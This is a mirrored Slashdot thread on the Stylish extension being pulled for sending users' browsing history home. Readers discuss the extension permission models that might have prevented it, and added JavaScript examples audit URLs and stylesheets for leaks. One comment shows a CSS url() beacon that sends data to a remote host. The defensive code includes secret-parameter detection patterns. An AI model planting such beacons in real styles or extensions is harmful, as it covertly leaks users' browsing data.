Slashdot Mirror


Firefox and Chrome Pull Popular Browser Extension Stylish From Their Stores After Report Claimed It Logs and Shares Browsing History, Credentials

sombragris writes: Stylish, a popular extension available for Chrome and Firefox which allows for easy customization of any website, now phones home and shares its users' browser history with its corporate parent, according to blogger Robert Heaton. This prompted Firefox to ban the extension from its addons site and prompt all users to disable it. The discussion can be seen in the relevant bug report. In Heaton's words:

Stylish is no longer a well-meaning product with your best interests at heart. If you use and like Stylish, please uninstall it and switch to an alternative like Stylus, an offshoot from the good old version of Stylish that works in much the same way, minus the spyware.

Google too has pulled the extension from its extension store. This is not the first time Stylish is at the centre of a privacy debacle.

68 comments

  1. Bad - but not surprising or unexpected by Anonymous Coward · · Score: 5, Insightful

    We now live in "The Internet Economy" where everything is based on "monetizing" the customer.

    1. Re: Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      And that's why advertising is the worst thing that happened to the internet.

    2. Re: Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      It is the worst thing happened.

    3. Re: Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      Chill, nobody died.

    4. Re:Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      What else would you monetize? Have you paid for content, or do you simply consume it? Have you paid for a browser extension?

    5. Re: Bad - but not surprising or unexpected by Anonymous Coward · · Score: 0

      Chill, nobody died.

      Nobody, died, true. Just some identities were sold or stolen and some web accounts compromised. What's the big deal? No blood, no foul, right?

  2. We need an extention protection mechanism by xack · · Score: 3, Informative

    Extentions need to be protected. We need to have a last known good backup system in place for extentions at risk of being hijacked.

    1. Re:We need an extention protection mechanism by Luthair · · Score: 3, Insightful

      Not sure what one can really do, if a developer willingly gives away the keys to the extension.

    2. Re:We need an extention protection mechanism by Anonymous Coward · · Score: 0

      No, we need better permissions on everything. The OS should prompt the user for each new permission and area/service a program wants to use and software with plug-ins should do the same with each plug-in*. Your choices: allow, deny, fake. Checkbox: once/always.

      Similar to phones, but far more fine grained for those who wish it. I know there's SELinux, I also have no clue how to set it up. The feature should be automatically blacklisting everything, like the firewall ZoneAlarm did. Install that and it annoyingly alerted on everything, but it was easy to quickly allow what was needed.

      *So we need a guide on how to wrap up API calls inside a permissions framework. Any takers? Any recommended reading? I need to write a plug-in supporting piece of software in the future...
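One way to wrap API calls in the allow / deny / fake, once / always scheme this comment describes, as an added example (not from the thread and not any browser's extension API). All names, the permission strings and the sample host state are hypothetical.

```javascript
// Added example; every name here is hypothetical.
class PermissionDenied extends Error {}

// Host API table: the permission each call needs, the real implementation,
// and the harmless stand-in returned when the user answers "fake".
const HOST_API = {
  currentUrl: { needs: "tabs.url", real: (h) => h.url, fake: () => "about:blank" },
  readHistory: { needs: "history", real: (h) => h.history.slice(), fake: () => [] },
  fetchRemote: {
    needs: "network",
    real: (h, target) => h.send(target),
    fake: () => ({ status: 204, body: "" }),
  },
};
const CHOICES = new Set(["allow", "deny", "fake"]);

// Builds the only object a plug-in receives. askUser(request) returns
// { choice: "allow" | "deny" | "fake", always: boolean }; anything else,
// including no answer at all, is treated as "deny" (deny by default).
function makePluginApi(pluginId, host, askUser, remembered = new Map()) {
  const api = {};
  for (const [call, spec] of Object.entries(HOST_API)) {
    api[call] = (...args) => {
      const key = `${pluginId}:${spec.needs}`;
      let choice = remembered.get(key);
      if (!choice) {
        const answer = askUser({ pluginId, permission: spec.needs, call, args }) || {};
        choice = CHOICES.has(answer.choice) ? answer.choice : "deny";
        if (answer.always) remembered.set(key, choice); // the "always" checkbox
      }
      // Every decision is recorded so the user can review what was asked for.
      host.audit.push({ pluginId, call, permission: spec.needs, choice });
      if (choice === "allow") return spec.real(host, ...args);
      if (choice === "fake") return spec.fake();
      throw new PermissionDenied(`${pluginId} may not use ${spec.needs}`);
    };
  }
  return Object.freeze(api);
}

// Constructed host state for the demonstration.
function makeSampleHost() {
  return {
    url: "https://bank.example/account?session=abc",
    history: ["https://bank.example/", "https://mail.example/inbox"],
    sent: [],
    audit: [],
    send(target) {
      this.sent.push(target);
      return { status: 200, body: "ok" };
    },
  };
}

// A styling plug-in under a user who allows URL access for good, fakes
// history for a single request, and never answers the network prompt.
function demo() {
  const host = makeSampleHost();
  const answers = {
    "tabs.url": { choice: "allow", always: true },
    history: { choice: "fake", always: false },
  };
  const api = makePluginApi("styler", host, (req) => answers[req.permission]);
  const seen = [api.currentUrl(), api.readHistory().length];
  try {
    api.fetchRemote("https://collector.example/");
  } catch (e) {
    seen.push(e.constructor.name);
  }
  return { seen, sent: host.sent.length, audit: host.audit.map((a) => a.choice) };
}

console.log(demo());
```

A table like this only mediates calls: the plug-in still has to run somewhere it cannot reach the host object or globals directly, which this example does not provide.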

    3. Re:We need an extention protection mechanism by cheesyweasel · · Score: 1

      Maybe extensions should be digitally signed like apps are with gatekeeper on osx, or authenticode on windows?

    4. Re:We need an extention protection mechanism by Waccoon · · Score: 3, Insightful

      While we're at it, could we also have a mechanism to override auto-updating? It sucks when a developer sells his extension, and then everything auto-updates to the all-new system without appropriate disclosure. One of many reasons I don't want ANYTHING to auto-update anymore.

    5. Re:We need an extention protection mechanism by Anonymous Coward · · Score: 3, Informative

      If you're on Firefox, go to about:config and flip "extensions.update.autoUpdateDefault" to "false". You can also change this per-extension by clicking on the "More" link on each extension. The first field is "Automatic Updates" and you can choose between Default, On, and Off.

    6. Re: We need an extention protection mechanism by Anonymous Coward · · Score: 0

      You could learn how to spell extension.

    7. Re:We need an extention protection mechanism by AHuxley · · Score: 1

      The browser gets an outgoing firewall for the extension? That looks like too much data getting uploaded? Tell the user that an encrypted network was established beyond what was needed for the extension update request?

      --
      Domestic spying is now "Benign Information Gathering"
    8. Re: We need an extention protection mechanism by houghi · · Score: 1

      What is "too much"? What if I want it to do that what it does?

      --
      Don't fight for your country, if your country does not fight for you.
    9. Re: We need an extention protection mechanism by AHuxley · · Score: 1

      Some standard framework for what an extension can do? Request a version number?
      More data moving out would need user agreement and browser support?
      Make the browser much more aware of what its extensions can do and what more they are allowed to do.

      --
      Domestic spying is now "Benign Information Gathering"
    10. Re:We need an extention protection mechanism by jbmartin6 · · Score: 1

      Given how browsers have become the primary application for so much sensitive information, I advise people to treat extensions the way they (should) treat any other unknown application. And disable automatic updates. But truth be told most people won't do that because it is a pain.

      --
      This posting is provided 'AS IS' without warranty of any kind, implied or otherwise.
    11. Re: We need an extention protection mechanism by JackieBrown · · Score: 1

      And then we can complain that browsers are limiting what extensions can do (like the complaints firefox gets.)

      This is just one of the risks you take when you install an extension. It's up to you to decide if what the extension does is worth the risk.

      I'm down to using almost no extensions and just using my host file to block domains.

    12. Re: We need an extention protection mechanism by Anonymous Coward · · Score: 0

      I'm sure there's an extension for that.

  3. Sad by Stan92057 · · Score: 1

    What's sad is many will say, me included at one time, ya get what ya pay for, so them becoming scummy isn't a surprise. The problem is even if you PAY for a product, take Windows 10, ya it was free but it's not free anymore and the paid version is no different than the unpaid version. All the spyware, data mining, loss of control over one's own settings and program choices are in the PAID version. The one that may allow users to fully control isn't sold to the general public. Point is, paying for a stinking product doesn't exclude the data spying you kinda expect from free crap. We need to get off our lazy butts and start putting pressure on Congress to get back the privacy that was taken from us, and ya, we allowed them.

    --
    Jack of all trades,master of none
    1. Re: Sad by Anonymous Coward · · Score: 0

      Windows 10 is still free: https://www.microsoft.com/en-us/software-download/windows10ISO

      Doesn't expire, but you can't change the wallpaper.

  4. old news... by Anonymous Coward · · Score: 0

    from january 2017:

    https://www.bleepingcomputer.c...

    there was an opt-out setting then.. is there still today?

    even still, the 'anonymous data' they're collecting isn't exactly anonymous

  5. But how bad? by Anonymous+Brave+Guy · · Score: 5, Interesting

    The title suggests that not just browsing history but credentials are uploaded. The latter is potentially much worse than the former. Does anyone have verifiable data on exactly what was uploaded? Does everyone who got caught out by this need to reset their IDs/passwords/whatever on every site they visited while using the extension? Or every site they've ever visited and allowed their browser to store login credentials?

    The new owners could be in pretty deep brown stuff anyway given that this sort of behaviour without explicit consent is now very illegal throughout Europe, but if they were stealing credentials then it would be prudent to reset everything, which of course could mean dozens or hundreds of different sites for some people.

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    1. Re:But how bad? by Anonymous Coward · · Score: 0

      Aren't extensions just Javascript? If you really like the extension (I don't use it myself) couldn't someone knowledgeable with Javascript just edit out the spyware?

    2. Re:But how bad? by Anonymous+Brave+Guy · · Score: 1

      That's essentially what happened with alternatives like Stylus that are now being recommended instead. What we can't figure out so easily is the past behaviour of all relevant versions of the Stylish extension itself.

      --
      If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    3. Re:But how bad? by Anonymous Coward · · Score: 2, Interesting

      The "credentials" part of the title is misleading.

      Stylish sends our complete browsing activity back to its servers, together with a unique identifier. [] The SimilarWeb Privacy Policy says that they only collect “non-personal” data, and I assume that this is technically true.

      There is only evidence that Stylish sends home browsing history, but TFA discusses how visited URLs may contain credentials or one-time keys, and how Stylish can link them to a userstyles.org account.

    4. Re:But how bad? by Anonymous Coward · · Score: 0

      The "credentials" are those contained in the site URLs such as unique token identifiers.

      They also sent your google searches (don't know about bing and other search engines)

    5. Re:But how bad? by Anonymous Coward · · Score: 0

      The title suggests that not just browsing history but credentials are uploaded. The latter is potentially much worse than the former. Does anyone have verifiable data on exactly what was uploaded?

      According to TFA, the full URL including query string of every site you visit (or your browser pre-fetches).

      Some of these URLs (such as every confirmation e-mail ever) puts the authentication in the query string. That's how authentication gets included.
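The point made in this comment, as an added example (not from the article or the thread): a check that picks out which URLs in a history export carry a secret in the query string, so the owner knows which links or tokens to treat as exposed, plus a redactor for logging such URLs. The parameter-name list, the value heuristic and the sample URLs are constructed assumptions.

```javascript
// Added example; the parameter names and the "looks random" heuristic are
// assumptions chosen for illustration, not a list taken from the article.
const SENSITIVE_NAMES =
  /^(token|access_token|auth|key|api_key|code|sig|signature|password|pwd|secret|session|sid)$/i;

// Long values mixing at least two character classes are treated as likely
// bearer secrets (reset links, signed download URLs, session ids).
function looksLikeSecret(value) {
  if (value.length < 20 || !/^[A-Za-z0-9_.~+\/=-]+$/.test(value)) return false;
  const classes = [/[a-z]/, /[A-Z]/, /[0-9]/].filter((re) => re.test(value));
  return classes.length >= 2;
}

// Returns the query parameters of one URL that would expose a secret to
// anything able to read the full address.
function findUrlSecrets(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch {
    return { url: rawUrl, parseable: false, findings: [] };
  }
  const findings = [];
  for (const [name, value] of url.searchParams) {
    if (SENSITIVE_NAMES.test(name)) findings.push({ name, reason: "name" });
    else if (looksLikeSecret(value)) findings.push({ name, reason: "value" });
  }
  return { url: rawUrl, parseable: true, host: url.hostname, findings };
}

// Same URL with flagged values blanked, safe to keep in logs or reports.
function redactUrl(rawUrl) {
  const { parseable, findings } = findUrlSecrets(rawUrl);
  if (!parseable) return rawUrl;
  const url = new URL(rawUrl);
  for (const { name } of findings) url.searchParams.set(name, "REDACTED");
  return url.href;
}

// Keep only history entries that need follow-up (rotate token, re-issue link).
function auditHistory(urls) {
  return urls.map(findUrlSecrets).filter((r) => r.findings.length > 0);
}

// Constructed sample history, not real traffic.
const SAMPLE_HISTORY = [
  "https://news.example/story?id=1234&page=2",
  "https://shop.example/reset?uid=7&token=Zx81kQp0",
  "https://files.example/d/report.pdf?s=Qm9iQWxpY2VDYXJvbDEyMzQ1Njc4OTA",
  "https://search.example/search?q=how+to+reset+router+password",
];

for (const hit of auditHistory(SAMPLE_HISTORY)) {
  console.log(hit.host, hit.findings.map((f) => f.name).join(","), redactUrl(hit.url));
}
```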

    6. Re:But how bad? by Anonymous+Brave+Guy · · Score: 1

      I saw that as well; that was what prompted my question. Any sanely implemented site isn't going to be sending things like plain text IDs and passwords as part of a query string, only one-time tokens and the like. It was whether Stylish was intercepting things like form submissions over HTTPS, or somehow scanning saved login credentials stored in the browser, that I was concerned about when I read the title. That would have suggested that users should be advised to change all of those passwords.

      --
      If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
    7. Re:But how bad? by thsths · · Score: 1

      Indeed - the latter would be criminal in most legislations around the world. There is nothing brown about it, it is a clear black hat activity.

    8. Re:But how bad? by Anonymous Coward · · Score: 0

      Any sanely implemented site isn't going to be sending things like plain text IDs and passwords as part of a query string

      And, yet, we time and time again see that the people who build websites (and make most internet connected devices) prove to be incompetent morons who know nothing at all about security.

      So would you really be surprised if this was happening?

      I sure as hell wouldn't, because I'm no longer willing to give the benefit of the doubt to corporations, because far too often it's Marketing and the idiots with MBAs making the decisions. In my experience, both of those groups are lying sacks of shit who can't be made to understand reality.

      Oh, and for anyone in marketing or who has an MBA who is offended ... I don't give a fuck. I have way too much real world experience to believe otherwise.

    9. Re:But how bad? by Anonymous Coward · · Score: 0

      By "in deep brown stuff", he clearly meant they could be in deep shit for this, not referring to the metaphorical colour of hat they might be wearing.

  6. We need to not keep trusting everyone's software by Anonymous+Brave+Guy · · Score: 4, Interesting

    There is a plague in the modern tech industry, where everything from browser extensions to microlibraries for your favourite programming language is written by someone you've never met, supplied via some sort of centralised repository or distribution channel that you trust instead, and then winds up on your machine doing who-knows-what because that trusted distribution mechanism missed something, or even because the trusted developer of some code you're running, which you downloaded via a trusted source, itself trusted someone else unwisely.

    The solution to this isn't just proper validation of where the code you're downloading actually came from, it's also to have security models more sophisticated than the 1980s in the Internet age. For example, why the hell could a browser extension that was there to modify the appearance of pages you were visiting suddenly choose to upload anything to the mothership without requiring additional permissions?

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  7. Why install that garbage by Anonymous Coward · · Score: 0

    Just get those website themes through userscripts.

  8. Spot the blame-jumping by Anonymous Coward · · Score: 0, Insightful

    Sure, this is clearly a shitty thing for an extension to do - but the real blame lies squarely with the FF devs. On what fscking planet is there justification for ALLOWING an extension to access history in the first place?! They were perfectly happy to permanently break thousands of legitimate and useful extensions a year ago by refusing to support existing functionality in the "new" APIs, but utter retardedness like this passed their "merit" test?

    (For the Chrome devs it's understandable, since the entire point of that browser is to spy on users in the first place).

    1. Re:Spot the blame-jumping by jaa101 · · Score: 2, Insightful

      the real blame lies squarely with the FF devs.

      Wrong.

      On what fscking planet is there justification for ALLOWING an extension to access history in the first place?!

      For examples, try searching for Firefox extensions involving history.

      Maybe there needs to be some kind of permissions system for extensions so that the user is prompted to grant access to things like history, credentials, form fields, user key-strokes, etc. Until there is, understand that you need to trust your extensions just as much as you have to trust the browser itself. This shouldn't be a surprise to anyone.

    2. Re:Spot the blame-jumping by Anonymous Coward · · Score: 2, Informative

      Maybe there needs to be some kind of permissions system for extensions so that the user is prompted to grant access to things like history, credentials, form fields, user key-strokes, etc.

      There is. That's part of the new extension system. The concept of permissions is fundamentally at odds with the old extensions system and was one of the reasons for the new extension system.

      Unfortunately, as pointed out elsewhere in this thread, there's no way to implement Stylish such that it doesn't have the rights to leak every URL you visit, since it can just add extra CSS that sends that information back via loading an image on its remote server. Of course, uMatrix or similar could block such a thing, but that's definitely a tool for advanced users.

    3. Re:Spot the blame-jumping by Raphael · · Score: 1

      Sure, this is clearly a shitty thing for an extension to do - but the real blame lies squarely with the FF devs. On what fscking planet is there justification for ALLOWING an extension to access history in the first place?!

      Your criticism is misdirected. Stylish does not need to access your browsing history (something that Firefox can block). But Stylish is designed to be active on every page that you visit so that it can apply custom styles for that site or tell you if some user styles exist for that site, Stylish sees every page that you visit, so it can collect and transmit its own view of your history. And unfortunately, that history can include some sensitive information as explained in the article.

      --
      -Raphaël
  9. Re:We need to not keep trusting everyone's softwar by Anonymous Coward · · Score: 0

    For example, why the hell could a browser extension that was there to modify the appearance of pages you were visiting suddenly choose to upload anything to the mothership without requiring additional permissions?

    Because of the way css works.

    Consider something like "background: url('https://back.home?sent=with&cookies=yes')".

    The separation between content and presentation in html is mostly posturing; in order to modify the appearance of a page, you need access to everything.

  10. Good! by Anonymous Coward · · Score: 0

    May the developers rot. Scum bags!

  11. Free is never free by Anonymous Coward · · Score: 0

    None of this is shocking, many of these developers of these extensions want to recoup their time and effort somehow. Maybe we all need to start realizing free is never free and collection of data and information in return for something is payment

  12. Why do people do this? by Frosty+Piss · · Score: 1

    Why do companies / people do this when there is *100 percent chance* that they will be discovered and excommunicated from the Internet Universe? One would think they would be a little more sneaky about it.

    --
    If you want news from today, you have to come back tomorrow.
    1. Re: Why do people do this? by Anonymous Coward · · Score: 0

      Because it took a while for this to come to light and they made millions

    2. Re: Why do people do this? by rojash · · Score: 1

      Proof ? And as long as these fucking browsers have these holes, we might as well bend down while browsing.

  13. Use Stylus Instead by Anonymous Coward · · Score: 1

    As the summary notes, stylish has been suspicious for a while. I switched to stylus last time and have been more than happy with it.

  14. Re:We need to not keep trusting everyone's softwar by Anonymous+Brave+Guy · · Score: 1

    Yes, you can do all kinds of things if the browser lets you. But there is no reason a browser couldn't simply impose a 100% firewall by default and let any extensions that genuinely do have a need to do something like your example ask for explicit permission. I would argue that the sort of behaviour you illustrated is relatively unusual for browser extensions, while sadly trying to exfiltrate data no longer is.

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  15. If you were using stylish on Firefox.... by gerald.edward.butler · · Score: 5, Informative

    I was using stylish for quite some-time. I'm disappointed that this kind of breaking of trust occurred with that extension. I've now switched over to stylus instead. It works great (even better than stylish). It seems to behave better, have a better UI, and more stability. So, if you're unsure what to use, definitely give stylus a try.

    1. Re:If you were using stylish on Firefox.... by Anonymous Coward · · Score: 0

      Thanks!

    2. Re:If you were using stylish on Firefox.... by Anonymous Coward · · Score: 2, Informative

      Can confirm, Stylus works just as well. No modification of my styles were needed.

  16. Re:We need to not keep trusting everyone's softwar by Anonymous Coward · · Score: 0

    False. Stylish and its ilk do nothing but insert CSS. Browsers can implement an official API point for such functionality and sandbox it if needed. If you really need access to everything to inject CSS, it shows that the browser and permissions API isn't designed well enough.

    Firefox, at least, still offers ye olden userStyle.css. The code is there; why not spruce it up a bit and make it an API call that has to go through the permission process? The only piece of information such an extension needs is the URL that you're visiting, so it can find and inject the CSS that you want on that page. Anything beyond that is asking for too much information. And it shouldn't be sending that data anywhere.

  17. Re:We need to not keep trusting everyone's softwar by stoborrobots · · Score: 1, Interesting

    As the grandparent pointed out, you haven't solved anything.

    Even if the plugin is only allowed to insert valid css into the page, it can send information back to any site on the internet, by using css properties which take url values, including background. The ability to send data to an arbitrary server is implicit in the ability to inject css into a page.
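What this means for anyone reviewing a user style before installing it, as an added example (not from the thread or from any style manager's code): a checker that lists every remote host a stylesheet would make the browser contact through `url()` or `@import`. The function name, the allow-list parameter and the sample CSS are constructed; it uses regular expressions rather than a full CSS parser and does not report relative references.

```javascript
// Added example; names and sample data are constructed for illustration.

// Remove /* ... */ so commented-out rules are not reported.
function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, "");
}

// Lists every reference in `css` that triggers a request to a remote host.
// Hosts in `allowedHosts` (for example a font CDN the reviewer accepts) are
// left out of the result.
function remoteLoads(css, allowedHosts = []) {
  const text = stripComments(css);
  // url("..."), url('...') and url(bare) forms.
  const urlRe = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]*))\s*\)/gi;
  // @import "..." string form; @import url(...) is caught by urlRe.
  const importRe = /@import\s+(?:"([^"]*)"|'([^']*)')/gi;

  const refs = [];
  for (const re of [urlRe, importRe]) {
    for (const m of text.matchAll(re)) {
      refs.push((m[1] ?? m[2] ?? m[3] ?? "").trim());
    }
  }

  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const findings = [];
  for (const ref of refs) {
    if (/^data:/i.test(ref)) continue; // inline data, no network request
    let parsed;
    try {
      if (ref.startsWith("//")) parsed = new URL("https:" + ref); // protocol-relative
      else if (/^[a-z][a-z0-9+.-]*:/i.test(ref)) parsed = new URL(ref);
      else continue; // relative reference: not reported by this check
    } catch {
      continue; // not a parseable URL
    }
    if (!parsed.hostname || allowed.has(parsed.hostname)) continue;
    findings.push({
      ref,
      host: parsed.hostname,
      // A query string on a "background image" deserves a closer look.
      hasQuery: parsed.search !== "",
    });
  }
  return findings;
}

// Constructed sample user style.
const SAMPLE_STYLE = `
/* dark theme for forum.example */
@import "https://fonts.cdn.example/inter.css";
body { background: #111 url("data:image/png;base64,iVBORw0KGgo=") repeat; }
.header { background-image: url(//img.cdn.example/banner.png); }
.nav { background: url('https://stats.tracker.example/p.gif?site=forum.example&u=1234'); }
/* .old { background: url(https://dead.example/x.png); } */
`;

for (const f of remoteLoads(SAMPLE_STYLE, ["fonts.cdn.example", "img.cdn.example"])) {
  console.log(`remote load: ${f.host}${f.hasQuery ? " (with query string)" : ""}`);
}
```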

  18. Stylish still exists? We moved on years ago, fam by kriston · · Score: 1

    Stylish still exists? We moved on years ago to Tampermonkey.

    --

    Kriston

  19. Bigger deal than what Facebook's doing by Chameleon+Man · · Score: 2

    People are concerned with the Cambridge Analytica stuff, where an app scrapes essentially publicly-made data of users, but browser extensions are far scarier. If granted the right permissions, they have free rein on scraping password data. I imagine far more extensions are doing it.

  20. Thank you! by Anonymous Coward · · Score: 0

    Next time someone asks me why I'm still using Opera 11 and tries to argue that I could get most of the features it has that modern browsers don't have through extensions, I now have another good reason to point out!

  21. Re:Stylish still exists? We moved on years ago, fa by aloniv · · Score: 1

    Are you sure you aren't confusing Stylish with Scriptish?

  22. Re:Stylish still exists? We moved on years ago, fa by Anonymous Coward · · Score: 0

    Stylish is a theme extension for theming websites and browsers (when they allow it) you dumbo.
    What you meant to say is Stylus or whatever else exists, not a script management addon.

  23. Re:We need to not keep trusting everyone's softwar by Anonymous+Brave+Guy · · Score: 1

    This is true if you allow insertion of arbitrary CSS (or running of arbitrary code that can trigger requests via JS etc.) and then process it with no questions asked. However, browsers already deal with related concerns in areas like the same-origin policy and CORS. They could apply similar safeguards to locally generated requests.

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  24. Peer review by thePsychologist · · Score: 1

    Someone needs to start a peer-review system for firefox extensions.

    The other day I installed a gestures extension and reviewed the source code myself before installing it for possible telemetry leaking. I didn't have any and it would be nice to upload my results to a website.

    If someone made it nice like stackexchange with points I bet it would take off.

    --
    "What lies behind us, and what lies before us are tiny matters compared to what lies within us." Ralph Waldo Emerson
    1. Re:Peer review by aaron44126 · · Score: 1

      I can only imagine that this would start a game, wherein nefarious add-on makers would create fake accounts to use to post positive peer reviews of their extension... There would have to be some kind of trust mechanism included and I'm not sure how that would work.

    2. Re:Peer review by JackieBrown · · Score: 1

      Nope. It's easy to game an extension but a review system? Impossible! lol

    3. Re:Peer review by JackieBrown · · Score: 1

      I think it reflects pretty poorly on Chrome how most of the comments are about how we are shocked that this could happen on Firefox. I guess we just took it for granted that it would happen using Chrome.

  25. Legal system by MobyDisk · · Score: 1

    Is this not a crime? Who perpetrated it? Or did everyone who installed the extension agree to a EULA explaining that it did this? If so, I believe the problem is the existence of a EULA. They are too long and complex, nobody reads them, and so they have all kinds of stuff in them. Since people agree to them automatically, they lose their rights to use the legal system that should be punishing these criminals.

    1. Re:Legal system by Anonymous Coward · · Score: 0

      So if it isn't in the EULA, it is wrong. If it is in the EULA, it is wrong. Correct? Praytell, is there ANY way to be right?

  26. Stylus alternative for Stylish, but styles site? by Anonymous Coward · · Score: 0

    The problem now is an alternative to the theme website userstyles.
    The new owners of Stylish, apart from doing the shit they are doing now, overhauled the userstyles UI and made it worse.
    Broke search, broke search result system, broke thumbnails for a period, made it look shit.
    Core point: Site which provide a system and a library of themes to theme websites to fix those shitty UI, change to preferred UI schemes, or improve UI;
    instead overhauls itself and breaks everything and does a poorer job at UI than the majority of the userbase which provides themes for other sites.
    Think about this for a second.

    Also Userstyles tries to force the installation of the new spyware-ridden Stylish version (Stylish post-2.0.7 on Firefox) when you try to install styles for websites,
    forcing users to manually install those styles and abandon the style update function.
    So a centralized and Stylus-connected alternative to userstyles is also badly needed.

  27. Re:Stylish still exists? We moved on years ago, fa by kriston · · Score: 1

    Nope, Tampermonkey et al. are supersets of the functionality provided by Stylish.

    --

    Kriston